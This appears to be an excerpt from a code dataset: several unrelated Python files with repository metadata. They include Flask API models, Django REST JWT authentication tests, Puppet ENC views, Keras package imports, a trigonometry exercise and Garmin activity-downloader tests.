"Apache-2.0"
] | null | null | null | from app.v1 import v1_api
from flask_restplus import fields,Namespace
applications_reg = v1_api.model('applications_Reg', {
'app_name': fields.String(required=True, description='position_name'),
'created_by': fields.String(required=True, description='role_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'role': fields.List(fields.String, description='role'),
'enabled': fields.Integer(required=True, description='enabled'),
#'created_at': fields.String(required=True, description='created_at'),
#'updated_at': fields.String(required=True, description='updated_at')
})
applications_reg_model_list = v1_api.model('applications_reg_model_list', {
#'id': fields.String(required=True, description='id'),
'app_name': fields.String(required=True, description='position_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'enabled': fields.Integer(required=True, description='enabled'),
#'created_at' : fields.String(required=True,description='created date'),
})
applications_reg_list = v1_api.model('applications_reg_list', {
'app_name': fields.String(required=True, description='position_name'),
'created_by': fields.String(required=True, description='role_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'role': fields.List(fields.String(description='role')),
'enabled': fields.Integer(required=True, description='enabled'),
'created_at': fields.String(required=True, description='created_at'),
'updated_at': fields.String(required=True, description='updated_at')
})
update_model=v1_api.model('update_model',{
'app_name': fields.String(required=True, description='position_name'),
'url_app': fields.String(required=True, description='url_app'),
'img_app': fields.String(required=True, description='img_app'),
'role': fields.List(fields.String(description='role')),
})
application_updates_fields = v1_api.model('application_updates_fields', {
'_id': fields.String(required=True, description='Application'),
'update':fields.Nested(update_model)
})
registration_base_fram_model = v1_api.model('registration_base_fram_model',{
#'_id': fields.String(required=True, description='Application'),
'base64':fields.String(required=True, description='base64'),
#'enabled': fields.Integer(required=True, description='enabled'),
#'created_at' : fields.String(required=True,description='created date'),
})
update_applications_model=v1_api.model('update_applications_model',{
'enabled': fields.Integer(required=True, description='enabled'),
})
application_updates = v1_api.model('application_updates', {
'_id': fields.String(required=True, description='Application'),
'update':fields.Nested(update_applications_model)
}) | 43.452055 | 80 | 0.703342 | 364 | 3,172 | 5.898352 | 0.104396 | 0.167676 | 0.321379 | 0.27946 | 0.883093 | 0.781556 | 0.737308 | 0.691663 | 0.691663 | 0.691663 | 0 | 0.005147 | 0.142497 | 3,172 | 73 | 81 | 43.452055 | 0.784191 | 0.144704 | 0 | 0.652174 | 0 | 0 | 0.214259 | 0.046915 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
00049ff1906a28059867a3d666a74ba48a32a57e | 9,285 | py | Python | kanban/api/tests/test_auth.py | bdelate/kanban | 00bff6743c2ac08760f702a15e23799bb113dc9c | [
"MIT"
] | 5 | 2021-02-17T19:45:34.000Z | 2022-02-06T12:04:46.000Z | kanban/api/tests/test_auth.py | bdelate/kanban | 00bff6743c2ac08760f702a15e23799bb113dc9c | [
"MIT"
] | 1 | 2018-05-25T11:43:53.000Z | 2018-05-25T11:43:53.000Z | kanban/api/tests/test_auth.py | bdelate/kanban | 00bff6743c2ac08760f702a15e23799bb113dc9c | [
"MIT"
] | 3 | 2020-06-26T09:11:24.000Z | 2021-02-17T19:45:38.000Z | from rest_framework.test import APITestCase
from rest_framework_jwt.settings import api_settings
from django.urls import reverse
from django.contrib.auth import get_user_model
from rest_framework import status
from .mixins import TestDataMixin
from api.models import Board, Card, Column
class SignUpTest(APITestCase):
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
def test_create_user_success(self):
data = {
'username': 'newuser',
'password': 'p@ssw0rd'
}
url = reverse('api:signup')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.filter(username='newuser').count()
self.assertEqual(user, 1)
def test_create_user_failure(self):
data = {
'username': 'newuser'
}
url = reverse('api:signup')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
user = get_user_model().objects.filter(username='newuser').count()
self.assertEqual(user, 0)
class BoardAuthTest(APITestCase, TestDataMixin):
@classmethod
def setUpTestData(cls):
cls.create_test_data()
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
def test_list_unauth_user_fails(self):
url = reverse('api:board_list_create')
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_unauth_user_fails(self):
data = {'name': 'new board'}
url = reverse('api:board_list_create')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_detail(self):
board = Board.objects.first()
url = reverse('api:board_detail', args=[board.id])
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
user = get_user_model().objects.get(username='john')
payload = self.jwt_payload_handler(user)
token = self.jwt_encode_handler(payload)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + token)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_unauth_user_fails(self):
board = Board.objects.first()
num_boards = Board.objects.count()
url = reverse('api:board_detail', args=[board.id])
response = self.client.delete(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(num_boards, Board.objects.count())
class ColumnAuthTest(APITestCase, TestDataMixin):
@classmethod
def setUpTestData(cls):
cls.create_test_data()
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
user = get_user_model().objects.get(username='john')
payload = self.jwt_payload_handler(user)
self.token = self.jwt_encode_handler(payload)
def test_detail(self):
column = Column.objects.first()
url = reverse('api:column_detail', args=[column.id])
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
board = Board.objects.first()
columns = Column.objects.filter(board_id=board.id).count()
data = {
'id': -1,
'spinner': 'true',
'name': 'new column',
'position_id': columns,
'board_id': 100,
'cards': []
}
# no token included in header
url = reverse('api:columns_create_update')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid board_id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
data['board_id'] = board.id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_update(self):
first_column = Column.objects.first()
last_column = Column.objects.last()
columns = [{
'id': first_column.id,
'cards': [],
'board_id': first_column.board_id,
'name': first_column.name,
'position_id': 0
}, {
'id': last_column.id,
'cards': [],
'board_id': last_column.board_id,
'name': last_column.name,
'position_id': 2
}]
data = {'columns': columns}
# no token included in header
url = reverse('api:columns_create_update')
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid data
response = self.client.patch(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
class CardAuthTest(APITestCase, TestDataMixin):
@classmethod
def setUpTestData(cls):
cls.create_test_data()
def setUp(self):
self.jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
self.jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
user = get_user_model().objects.get(username='john')
payload = self.jwt_payload_handler(user)
self.token = self.jwt_encode_handler(payload)
def test_detail(self):
card = Card.objects.first()
url = reverse('api:card_detail', args=[card.id])
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
column = Column.objects.first()
data = {
'id': -1,
'spinner': 'true',
'task': 'newly created test task',
'column_id': -1,
'position_id': Column.objects.count()
}
# no token included in header
url = reverse('api:cards_create_update')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid columm_id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
data['column_id'] = column.id
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_update(self):
first_card = Card.objects.first()
last_card = Card.objects.last()
cards = [{
'id': first_card.id,
'task': 'column 1 card 3',
'position_id': 0,
'column_id': first_card.column_id
}, {
'id': last_card.id,
'task': 'column 1 card 1',
'position_id': 2,
'column_id': last_card.column_id
}]
data = {'cards': cards}
# no token included in header
url = reverse('api:cards_create_update')
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# invalid data
response = self.client.patch(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# valid data
response = self.client.patch(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
| 36.269531 | 77 | 0.628002 | 1,067 | 9,285 | 5.249297 | 0.102156 | 0.053562 | 0.073915 | 0.10266 | 0.806999 | 0.753437 | 0.732905 | 0.732905 | 0.732905 | 0.721121 | 0 | 0.012531 | 0.260851 | 9,285 | 255 | 78 | 36.411765 | 0.803584 | 0.023263 | 0 | 0.629032 | 0 | 0 | 0.080559 | 0.01568 | 0 | 0 | 0 | 0 | 0.139785 | 1 | 0.102151 | false | 0.005376 | 0.037634 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
001ef3521e5f8a630902035876cc0b77ee9bdab6 | 460 | py | Python | __init__.py | dimagela29/Cientista-de-dados | 056f2bb0e8d3d1b8eb3dcb8c42819b076edd2716 | [
"MIT"
] | 914 | 2017-01-21T03:07:33.000Z | 2022-02-18T10:31:51.000Z | keras_adversarial/__init__.py | tungsomot/keras-adversarial | 6651cfad771f72521c78a5cc3a23a2313efeaa88 | [
"MIT"
] | 64 | 2017-01-30T11:19:47.000Z | 2020-09-07T12:17:58.000Z | keras_adversarial/__init__.py | tungsomot/keras-adversarial | 6651cfad771f72521c78a5cc3a23a2313efeaa88 | [
"MIT"
] | 268 | 2017-01-22T13:41:22.000Z | 2022-03-30T00:59:52.000Z | from .adversarial_model import AdversarialModel
from .adversarial_optimizers import AdversarialOptimizerAlternating
from .adversarial_optimizers import AdversarialOptimizerSimultaneous, AdversarialOptimizer
from .adversarial_optimizers import AdversarialOptimizerScheduled
from .adversarial_utils import gan_targets, build_gan, normal_latent_sampling, eliminate_z, fix_names, simple_gan
from .adversarial_utils import n_choice, simple_bigan, gan_targets_hinge
| 65.714286 | 113 | 0.9 | 49 | 460 | 8.102041 | 0.530612 | 0.2267 | 0.188917 | 0.234257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069565 | 460 | 6 | 114 | 76.666667 | 0.92757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
004d2947fc9aa587e0b7d4bdcfea7dfff6349043 | 47 | py | Python | product/widgets/__init__.py | hung3a8/greenier | 7e67847b21a3b2ab1b066eb30c4dd42a6e3dcb82 | [
"MIT"
] | 6 | 2021-12-02T11:19:44.000Z | 2022-03-27T06:27:21.000Z | product/widgets/__init__.py | hung3a8/greenier | 7e67847b21a3b2ab1b066eb30c4dd42a6e3dcb82 | [
"MIT"
] | null | null | null | product/widgets/__init__.py | hung3a8/greenier | 7e67847b21a3b2ab1b066eb30c4dd42a6e3dcb82 | [
"MIT"
] | null | null | null | from .filemage import *
from .select2 import *
| 15.666667 | 23 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.170213 | 47 | 2 | 24 | 23.5 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc4d567701f228326ff770aefdc3e17fb94e5796 | 187 | py | Python | src/kuzushiji_data/data_config.py | aihill/kuzushiji-recognition | 3b677c086a915691c02fa4e655ce1def9b0326a7 | [
"MIT"
] | 1 | 2019-10-24T13:05:18.000Z | 2019-10-24T13:05:18.000Z | src/kuzushiji_data/data_config.py | aihill/kuzushiji-recognition | 3b677c086a915691c02fa4e655ce1def9b0326a7 | [
"MIT"
] | null | null | null | src/kuzushiji_data/data_config.py | aihill/kuzushiji-recognition | 3b677c086a915691c02fa4e655ce1def9b0326a7 | [
"MIT"
] | null | null | null | data_dir = 'C:/Users/stnu2/Documents/Kaggle/kuzushiji-recognition/data'
font_path = 'C:/Users/stnu2/Documents/Kaggle/kuzushiji-recognition/NotoSansCJKjp-hinted/NotoSansCJKjp-Regular.otf' | 93.5 | 114 | 0.828877 | 24 | 187 | 6.375 | 0.625 | 0.078431 | 0.143791 | 0.261438 | 0.601307 | 0.601307 | 0.601307 | 0 | 0 | 0 | 0 | 0.01105 | 0.032086 | 187 | 2 | 114 | 93.5 | 0.834254 | 0 | 0 | 0 | 0 | 0.5 | 0.84492 | 0.84492 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc4f0349b8551872c05be856119e0b2bf5715983 | 250 | py | Python | new_users/models.py | wangjinyu124419/django1.8_demo | bd61264afe246b231d9724be2675b6bae433d180 | [
"MIT"
] | null | null | null | new_users/models.py | wangjinyu124419/django1.8_demo | bd61264afe246b231d9724be2675b6bae433d180 | [
"MIT"
] | 7 | 2020-06-05T21:47:36.000Z | 2022-03-11T23:52:50.000Z | new_users/models.py | wangjinyu124419/django1.8_demo | bd61264afe246b231d9724be2675b6bae433d180 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.contrib.auth.models import Group
# Create your models here.
class CmsUser(AbstractUser):
pass
class CmsGroup(Group):
pass | 17.857143 | 51 | 0.748 | 34 | 250 | 5.5 | 0.558824 | 0.160428 | 0.181818 | 0.224599 | 0.352941 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0.004739 | 0.156 | 250 | 14 | 52 | 17.857143 | 0.881517 | 0.184 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.285714 | 0.428571 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
cc7e704e7125c6357a85d6b05c2281bbff4cec4d | 674 | py | Python | Mundo01/Exercicios/ex018.py | molonti/CursoemVideo---Python | 4f6a7af648f7f619d11e95fa3dc7a33b28fcfa11 | [
"MIT"
] | null | null | null | Mundo01/Exercicios/ex018.py | molonti/CursoemVideo---Python | 4f6a7af648f7f619d11e95fa3dc7a33b28fcfa11 | [
"MIT"
] | null | null | null | Mundo01/Exercicios/ex018.py | molonti/CursoemVideo---Python | 4f6a7af648f7f619d11e95fa3dc7a33b28fcfa11 | [
"MIT"
] | null | null | null | '''import math
ang = float(input('Digite o Angulo: '))
seno = math.sin(math.radians(ang))
print('Angulo {} temos o Seno {:.2f}'.format(ang, seno))
coss = math.cos(math.radians(ang))
print('Angulo {} temos o Cosseno {:.2f}'.format(ang, coss))
tang = math.tan(math.radians(ang))
print('Angulo {} temos a Tangente {:.2f}'.format(ang, tang))'''
from math import radians, sin, cos, tan
ang = float(input('Digite o Angulo: '))
seno = sin(radians(ang))
print('Angulo {} temos o Seno {:.2f}'.format(ang, seno))
coss = cos(radians(ang))
print('Angulo {} temos o Cosseno {:.2f}'.format(ang, coss))
tang = tan(radians(ang))
print('Angulo {} temos a Tangente {:.2f}'.format(ang, tang)) | 39.647059 | 63 | 0.664688 | 105 | 674 | 4.266667 | 0.219048 | 0.133929 | 0.200893 | 0.28125 | 0.84375 | 0.84375 | 0.834821 | 0.683036 | 0.683036 | 0.683036 | 0 | 0.010118 | 0.120178 | 674 | 17 | 64 | 39.647059 | 0.745363 | 0.495549 | 0 | 0 | 0 | 0 | 0.331343 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.375 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cca10c6db9decf881c13e5a084c37c3762e778f4 | 46 | py | Python | datafy/__init__.py | ResidentMario/datafy | dbc0d193a8c597bc784433ef04935e13856a6666 | [
"MIT"
] | null | null | null | datafy/__init__.py | ResidentMario/datafy | dbc0d193a8c597bc784433ef04935e13856a6666 | [
"MIT"
] | 2 | 2017-05-29T16:23:25.000Z | 2017-05-29T16:26:58.000Z | datafy/__init__.py | ResidentMario/datafy | dbc0d193a8c597bc784433ef04935e13856a6666 | [
"MIT"
] | null | null | null | from .datafy import get, FileTooLargeException | 46 | 46 | 0.869565 | 5 | 46 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aeb426b18598084dae90e4c65c548d432e8089ab | 400 | py | Python | tests/test_all.py | nextnanopy/nextnanopy | f28266d444f488726f16c9a4eb08e98720f5f683 | [
"BSD-3-Clause"
] | 9 | 2020-12-01T15:32:40.000Z | 2022-03-12T06:36:12.000Z | tests/test_all.py | nextnanopy/nextnanopy | f28266d444f488726f16c9a4eb08e98720f5f683 | [
"BSD-3-Clause"
] | 1 | 2022-03-16T14:46:06.000Z | 2022-03-22T14:13:32.000Z | tests/test_all.py | nextnanopy/nextnanopy | f28266d444f488726f16c9a4eb08e98720f5f683 | [
"BSD-3-Clause"
] | 4 | 2021-07-06T07:25:47.000Z | 2022-03-12T06:36:18.000Z | import unittest
from tests.test_commands import *
from tests.test_inputs import *
from tests.test_misc import *
from tests.test_outputs import *
from tests.test_shapes import *
from tests.test_defaults import *
from tests.test_config import *
from tests.test_formatting import *
from tests.test_datasets import *
from tests.test_mycollections import *
if __name__ == '__main__':
unittest.main()
| 26.666667 | 38 | 0.8 | 57 | 400 | 5.298246 | 0.315789 | 0.298013 | 0.430464 | 0.566225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13 | 400 | 14 | 39 | 28.571429 | 0.867816 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.846154 | 0 | 0.846154 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9de1b357d72233a7c2ffe111bc3857458ff01af6 | 2,411 | py | Python | enc/views.py | coxmediagroup/nodemeister | ecfd2c04f516b1ea022c55ce4372976055a39e5f | [
"Apache-2.0"
] | null | null | null | enc/views.py | coxmediagroup/nodemeister | ecfd2c04f516b1ea022c55ce4372976055a39e5f | [
"Apache-2.0"
] | null | null | null | enc/views.py | coxmediagroup/nodemeister | ecfd2c04f516b1ea022c55ce4372976055a39e5f | [
"Apache-2.0"
] | null | null | null | # Create your views here.
from django.http import HttpResponse
import enc
import yaml
def puppet(request, hostname):
"""
The view used to generate YAML for the puppet node_terminus script.
Calls enc.get_host_data(hostname), formats that into a dict,
and returns the yaml.safe_dump() of that as the response content.
:param request: Django request object
:param hostname: name of the host to return YAML for
:type hostname: string
:returns: HttpResponse of YAML
"""
(classlist, params) = enc.get_host_data(hostname)
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response, content_type="application/x-yaml")
def walkit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'walk')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
def classworkit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'classwork')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
def workit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'work')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
def optworkit(request, hostname):
"""
Unused. Appears to be left over from testing/debugging.
May, in fact, be better/more efficient than the used puppet() method.
"""
(classlist, params) = enc.get_host_data(hostname, 'optwork')
enc_output = {"classes": classlist, "parameters": params}
response = yaml.safe_dump(enc_output, default_flow_style=False)
return HttpResponse(response)
| 35.985075 | 73 | 0.712982 | 313 | 2,411 | 5.364217 | 0.258786 | 0.053603 | 0.035736 | 0.05003 | 0.746278 | 0.733175 | 0.733175 | 0.711138 | 0.711138 | 0.711138 | 0 | 0 | 0.183326 | 2,411 | 66 | 74 | 36.530303 | 0.852717 | 0.361261 | 0 | 0.5 | 1 | 0 | 0.089185 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.178571 | false | 0 | 0.107143 | 0 | 0.464286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae19667d008a42fb2c47b78611d405c1f73c86f0 | 31 | py | Python | figpager/__init__.py | gtdang/figpager | b4d77a937ea5d9682e747049d98d692e9d24f7ed | [
"MIT"
] | null | null | null | figpager/__init__.py | gtdang/figpager | b4d77a937ea5d9682e747049d98d692e9d24f7ed | [
"MIT"
] | null | null | null | figpager/__init__.py | gtdang/figpager | b4d77a937ea5d9682e747049d98d692e9d24f7ed | [
"MIT"
] | null | null | null | from .figpager import FigPager
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
881df6670abb4eecb5a9e0a0ad429563ab63251a | 13,147 | py | Python | tests/test_download.py | jamesmstone/garpy | 96255f108fd8c194e935b9fc8e2ab7be19acab12 | [
"Apache-2.0"
] | 18 | 2020-01-13T10:38:24.000Z | 2022-03-02T17:06:00.000Z | tests/test_download.py | jamesmstone/garpy | 96255f108fd8c194e935b9fc8e2ab7be19acab12 | [
"Apache-2.0"
] | 13 | 2019-09-23T14:16:23.000Z | 2022-03-29T04:16:16.000Z | tests/test_download.py | jamesmstone/garpy | 96255f108fd8c194e935b9fc8e2ab7be19acab12 | [
"Apache-2.0"
] | 5 | 2019-11-02T16:22:17.000Z | 2022-01-07T06:15:24.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
from unittest.mock import Mock
from conftest import get_activity, get_mocked_response
from garpy import Activities, ActivitiesDownloader, Activity
from garpy.download import DEFAULT_FORMATS
RESPONSE_EXAMPLES_PATH = Path(__file__).parent / "response_examples"
class TestActivitiesDownloader:
"""download.ActivitiesDownloader"""
def test_backup_dir_with_path(self, client, tmp_path):
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.backup_dir.exists()
assert downloader.backup_dir == tmp_path
def test_backup_dir_with_str(self, client, tmp_path):
downloader = ActivitiesDownloader(client, str(tmp_path))
assert isinstance(downloader.backup_dir, Path)
assert downloader.backup_dir.exists()
assert downloader.backup_dir == tmp_path
def test_backup_dir_inexistent(self, client, tmp_path):
tmp_path.rmdir()
assert not tmp_path.exists()
downloader = ActivitiesDownloader(client, str(tmp_path))
assert downloader.backup_dir.exists()
assert downloader.backup_dir == tmp_path
def test_existing_files_is_empty(self, client, tmp_path):
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.existing_files == set()
def test_existing_files_has_file_after_download(self, activity, client, tmp_path):
with client:
client.session.get = Mock(
return_value=get_mocked_response(
200, text="Trust me, this is a GPX file"
),
func_name="client.session.get()",
)
fmt = "gpx"
activity.download(client, fmt, tmp_path)
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.existing_files == {
activity.get_export_filepath(tmp_path, fmt)
}
def test_not_found_inexistent(self, client, tmp_path):
downloader = ActivitiesDownloader(client, str(tmp_path))
assert not (downloader.backup_dir / ".not_found").exists()
assert downloader.not_found == set()
def test_not_found_empty(self, client, tmp_path):
downloader = ActivitiesDownloader(client, str(tmp_path))
(downloader.backup_dir / ".not_found").touch()
assert (downloader.backup_dir / ".not_found").exists()
assert downloader.not_found == set()
def test_not_found_has_file_after_failed_download(self, activity, client, tmp_path):
with client:
client.session.get = Mock(
return_value=get_mocked_response(404), func_name="client.session.get()"
)
fmt = "gpx"
activity.download(client, fmt, tmp_path)
downloader = ActivitiesDownloader(client, tmp_path)
assert downloader.not_found == {activity.get_export_filepath(tmp_path, fmt)}
def test_discover_formats_to_download_with_backup_from_scratch(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 10
for activity, formats in to_download.items():
assert set(formats) == set(DEFAULT_FORMATS)
def test_discover_formats_to_download_with_incremental_backup(
self, client_activities, tmp_path
):
activities = client_activities.list_activities()
assert len(activities) == 10
with client_activities:
activity = Activity.from_garmin_activity_list_entry(activities[0])
for fmt in DEFAULT_FORMATS:
activity.download(client_activities, fmt, tmp_path)
downloader = ActivitiesDownloader(client_activities, tmp_path)
to_download = downloader._discover_formats_to_download(
Activities.list(client_activities)
)
assert len(to_download) == 9
